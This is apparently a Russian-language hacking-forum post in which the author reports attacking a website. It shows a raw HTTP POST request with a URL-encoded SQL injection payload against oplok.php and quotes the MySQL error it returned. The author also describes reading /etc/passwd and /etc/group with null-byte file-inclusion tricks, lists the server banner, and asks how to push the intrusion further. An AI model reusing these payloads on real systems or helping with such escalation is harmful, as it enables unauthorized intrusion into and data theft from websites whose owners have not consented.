Нашёл инъекцию через POST :

POST /oplok.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.site.com
Content-Length: 66
Cookie: PHPSESSID=a0e17714683f525e29aa6268ed85bf8b;hotlog= 1
Connection: Close
Pragma: no-cache

id=%2D%31%2B%6F%72%64%65%72%2B%62%79%2B%35%30%30%3 0%30%30%30%2F%2A

Передал запрос : -1+order+by+5000( тот,что выше).При передаче вместо 5000 еденицы или нуля выдаёт ту же ошибку -

<b>Warning</b>: mysql_free_result(): supplied argument is not a valid MySQL result resource in <b>/home/wmkhark/public_html/oplok.php</b> on line <b>500</b><br />

Не может же такого быть О_О )(

Я знаю, про это где-то писали, лень мучить форум поиском:Р.

Достал я вот файл etc/passwd.Пароль там не хранится,но есь какийто пути.Так же есь фаил etc/group. Не пойму,почему не работает etc/passwd%00.txt,но работает etc/passwd%00.jpg ? Они же не в этом формате Ж).Имея только эти файлы сделать что-то можно ?).Или какие-то другие пути нужны?

Server banner Apache/2.2.3 (CentOS)
Operating system Unix
Web server Apache 2.x

Из чувствительных директорий только /forum,/forum/css и т.д,но к ним нет доступа. папок типа админ и администратор нету.Йа ф шоке. Некуда даже инфу вводить))